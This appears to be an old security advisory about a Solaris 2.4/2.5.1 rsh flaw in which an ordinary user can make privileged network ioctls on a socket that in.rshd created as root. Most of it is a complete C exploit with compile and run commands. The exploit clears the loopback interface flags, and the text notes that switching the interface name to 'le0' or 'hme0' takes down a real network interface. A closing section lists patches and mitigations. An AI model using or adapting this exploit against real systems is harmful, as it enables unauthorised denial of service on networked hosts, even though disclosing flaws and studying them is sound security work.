COMMAND

    rsh

SYSTEMS AFFECTED

    Solaris 2.4, 2.5.1

PROBLEM

    The following is an rsh exploit by Alan Cox.

	cc solarisuck.c -o solarisuck -lsocket
	rsh localhost ./solarisuck

	------------
	solarisuck.c
	------------
	#include <stdio.h>
	#include <string.h>          /* strcpy */
	#include <unistd.h>          /* ioctl prototype on Solaris */
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/sockio.h>      /* SIOCSIFFLAGS */
	#include <net/if.h>          /* struct ifreq */
	#include <netinet/in.h>

	int main(int argc, char *argv[])
	{
		struct ifreq please_break_me;

		/* Request that every flag (UP included) be cleared on the
		 * loopback interface. */
		strcpy(please_break_me.ifr_name, "lo0");
		please_break_me.ifr_flags = 0;

		/* fd 0 is the connection socket that in.rshd accepted as root
		 * and handed to the user's command as stdin.  On unpatched
		 * Solaris 2.4/2.5.1 the privileged ioctl is allowed because the
		 * socket was created by root, not because of who is calling. */
		if (ioctl(0, SIOCSIFFLAGS, &please_break_me) == -1)
			perror("Damn it didnt work. Obviously not Solaris ;)");
		return 0;
	}

    You can adjust this to do other things. Basically any user can  do
    network control requests on a root created socket descriptor.

    If you  change the  "lo0" to  "le0" or  "hme0" (depending  on your
    interface names) it will work like a charm.  This also works  with
    rexecd.

SOLUTION

    Disable rsh and any non-root-owned inetd  tasks (this breaks remote
    tar etc.).  This appears to be fixed in 2.6 at any rate.
    Patch 103093-13 (Solaris 2.5  SPARC) claims to fix  (among others)
    the following problem:

        1238582 privileged ifconfig ioctls  by normal user succeed  on
                sockets created as root